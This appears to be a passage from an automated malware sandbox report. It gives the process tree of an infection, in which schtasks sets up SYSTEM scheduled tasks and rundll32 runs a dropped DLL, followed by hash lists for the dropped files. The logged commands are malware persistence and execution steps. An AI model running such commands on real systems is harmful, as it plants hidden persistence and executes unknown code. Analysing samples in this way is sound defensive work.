C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DNDvMcbpefrYjKZ"3⤵PID:1912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DNDvMcbpefrYjKZ"3⤵PID:1464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WEhIDiLYPHjasB" /F /xml "C:\Program Files (x86)\ATZmuaBwNwmU2\qrwUJMs.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uMLBCyigOFctO2" /F /xml "C:\ProgramData\fxkldoUMcXUSOxVB\ZDCKKQr.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kiDkdQMpQtFhhDeJz2" /F /xml "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\BwUFlhz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VjVOLqrPjSeucnEqiOK2" /F /xml "C:\Program Files (x86)\aJAQLsoDkiWqC\hKEEzLh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mDNVJgqIdbaAfzWWp" /SC once /ST 05:45:09 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\EGEmgoWS\hykScDb.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mDNVJgqIdbaAfzWWp"3⤵PID:620
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\EGEmgoWS\hykScDb.dll",#1 /site_id 5254032⤵PID:1528
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\EGEmgoWS\hykScDb.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:776 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mDNVJgqIdbaAfzWWp"4⤵PID:1416
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1280
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1944
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "125354022818074794311374605393726078444-2035405735-1023878510-8474156922134814489"1⤵
- Windows security bypass
PID:884
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-435607334-1958882376-873942782-1369978701-9976941981342711732-1919933411241920478"1⤵
- Windows security bypass
PID:1164
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "976059290390957483-16150810531135248013-712969108500288735-1571017094-1034962715"1⤵
- Windows security bypass
PID:1372
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1476
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD516ebd0d61affce278e665c141d55f21b
SHA18a9172177a216a149c1e7215dd5fdac375aa1442
SHA256f46cef6c916d2f49a523664c90f3f90bbfd6249839ffe80417eb96881cab2671
SHA51294ea8faef9953a9ecc509b6146b1a0b11377429a80c13b022a576fb9364f4b9d86a9a37ab199a51e6da2eb0ac26b2525919571821d5f7f2f32501c92b68e9005
-
Filesize
2KB
MD5dcf37bd0d39ab5dbcf3fca916f0ca988
SHA1c78ff1b766840d56e9f20387358413c409e42c65
SHA2561cfc24974a2b4f862f099c23a13e0a4b58437030ac3eb80b87dbe52e66c3fc1f
SHA512f4e2e9f0aec43bfdb5a955b0ef3eadba4b233c6f7f662c2d6eb2f1cfbba8e3b6b147c1d0dc1139c25ddd01a6f7749cba4c2c28538b159bfe512db60c6bc0a883
-
Filesize
2KB
MD51d42d616534471580edeac9949ce4d35
SHA1550c13d8eef0e8489a2cbbbd59ac1be3a9a9427a
SHA2564fc2d65c25e3e06073531b700a0d8cea2689c35f916f694f2ec23c9afe122196
SHA512a1d211463390853628b4533d980b03b62a98106cd86fe69b5b7f088d1e43850a3c9e2c65e15b2250ac03e901118630643e5a4cbba8688fbd7aa1a8232dfa856b
-
Filesize
2KB
MD514004ab3261d77bc3696192e92919d02
SHA1af5700f2864b073cc5252b674baea033fa372b3c
SHA256c0932df52bb9aa896584798c5ed0408e9aeccd075e820146cee0996c2e5e3fbb
SHA512188f96a38674eba047427e75f626f583882ecc799e8b568667ce641402bba6c8cb5da1ce7a7c304d45c126bd28fde96e42bdd1159af8ba2557bf33bc153bf7c0
-
Filesize
2KB
MD5076724bea7c33714796daffad4705421
SHA155c7310e2d03d086137d922ee5375cf3a5c3181a
SHA2561e488696c355ea72689ae49fda65f3d0d3046f80e8312468d766888feac5b02e
SHA51216cab8b3504804b353b460521fe7a398032913f82249887fcbb8fb2e574edea6149aa6aafbec27bed87a3983c99b235baf4ad43e3816ce205c004a2906e8b5db
-
Filesize
6.4MB
MD5ac56100ecce3cff2c707def52b0c990e
SHA1f0f01389c7a0df61cb2ed5f133a8dd538040f458
SHA25672e5592b65250ceb78222a6f228e8eba0d60cd5b426460d5e3df8befa0f327da
SHA512b122d97a260c3f1485dad4ae9c97f35e1ca91c5acc7861c2711c72119fc20a9480faabe40189e343ae1b23190ac3c69d80c0cfd72a2a78e0a0b1922f41514d2d
-
Filesize
6.4MB
MD5ac56100ecce3cff2c707def52b0c990e
SHA1f0f01389c7a0df61cb2ed5f133a8dd538040f458
SHA25672e5592b65250ceb78222a6f228e8eba0d60cd5b426460d5e3df8befa0f327da
SHA512b122d97a260c3f1485dad4ae9c97f35e1ca91c5acc7861c2711c72119fc20a9480faabe40189e343ae1b23190ac3c69d80c0cfd72a2a78e0a0b1922f41514d2d
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD526bb232de6f40156c4aa582e2a1b4609
SHA15510b1026d159abb0ad7ab451d21b07ec119a89e
SHA2566efadd1cc7e9285bb008f7d6c4f0bb0aa8ba1dcbc6fb445907dcc2e89fc8a168
SHA5126e0c8bdef9e0f022fb8442f8d02e210779be7835f118f0f15cbd0e03b2b6dce250cc9cfe1a225ef9004b05e89671a76366613072ef5138f942ccb4ade513767e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f749068eb1ba54ac2e80ab6becee0e60
SHA128239464cf7132c9704b0a8751164a5d15ab2eac
SHA25670e3a8ef402b2cc98b23a9cb82be646bc5cc0b8388892b42acad79c928df750e
SHA51298715e195c7903f8bea6491c7b3dd04ea7537ced5e223b5b430f569ec58165721f26e610e9dd21dad4fe6d30e640e6e4fd0f1932365bbc8277276709de1b71bc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a026fdcf1347e46cedd543f2bd01a259
SHA17da4b030e8b3da7850c1317f341c79e5a63ff3b6
SHA256258f0a4c12bb4aea4f43e6a2785d386ad41557eec56425fe38a646ee05dcf6ce
SHA512ee519251c84f8dc9555e93e062c027cadbb28009f06fa7c4830f68a3eeb091502d7c42e47b8fd5d914cd3bfd8e12177a5a937656151f43d7d01862033f97171c
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
8KB
MD50f7652fc551c9f964a285dd607b76ba0
SHA1de8960db6cef376f6ef3c3ba1e237c33ff75325e
SHA25659d5f4a918d115e1cf12c10dce915e08edf0bf134379d2b3c19af2198b23703f
SHA5129405e1114f831ef95d1021322bfae0bd4f86afcab5c8fd68948aef2059936be8dcefa84dea3eae563d8405c3d9b3c3fc337c86bae2e83633c4e47590cd41366d
-
Filesize
4KB
MD5d80d04d5b21251a54b3e6bbbeabfeb8e
SHA18c3a1ed769ec7465ebd3e60703e21eb82eb9b3fd
SHA256af6cd79eb6b65d2dd54a4dd6825525351cafca9fa532ece11503e0471459fff3
SHA512bd6ed8d75d8a0f725e0a26d03afc5ed18b1532facb56926134050f56911d6049376b8acb47f0db9b91770cf3de7cd466a44765382064a3d1c350e3823863efba
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
6.4MB
MD5ac56100ecce3cff2c707def52b0c990e
SHA1f0f01389c7a0df61cb2ed5f133a8dd538040f458
SHA25672e5592b65250ceb78222a6f228e8eba0d60cd5b426460d5e3df8befa0f327da
SHA512b122d97a260c3f1485dad4ae9c97f35e1ca91c5acc7861c2711c72119fc20a9480faabe40189e343ae1b23190ac3c69d80c0cfd72a2a78e0a0b1922f41514d2d
-
Filesize
6.4MB
MD5ac56100ecce3cff2c707def52b0c990e
SHA1f0f01389c7a0df61cb2ed5f133a8dd538040f458
SHA25672e5592b65250ceb78222a6f228e8eba0d60cd5b426460d5e3df8befa0f327da
SHA512b122d97a260c3f1485dad4ae9c97f35e1ca91c5acc7861c2711c72119fc20a9480faabe40189e343ae1b23190ac3c69d80c0cfd72a2a78e0a0b1922f41514d2d
-
Filesize
6.4MB
MD5ac56100ecce3cff2c707def52b0c990e
SHA1f0f01389c7a0df61cb2ed5f133a8dd538040f458
SHA25672e5592b65250ceb78222a6f228e8eba0d60cd5b426460d5e3df8befa0f327da
SHA512b122d97a260c3f1485dad4ae9c97f35e1ca91c5acc7861c2711c72119fc20a9480faabe40189e343ae1b23190ac3c69d80c0cfd72a2a78e0a0b1922f41514d2d
-
Filesize
6.4MB
MD5ac56100ecce3cff2c707def52b0c990e
SHA1f0f01389c7a0df61cb2ed5f133a8dd538040f458
SHA25672e5592b65250ceb78222a6f228e8eba0d60cd5b426460d5e3df8befa0f327da
SHA512b122d97a260c3f1485dad4ae9c97f35e1ca91c5acc7861c2711c72119fc20a9480faabe40189e343ae1b23190ac3c69d80c0cfd72a2a78e0a0b1922f41514d2d
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d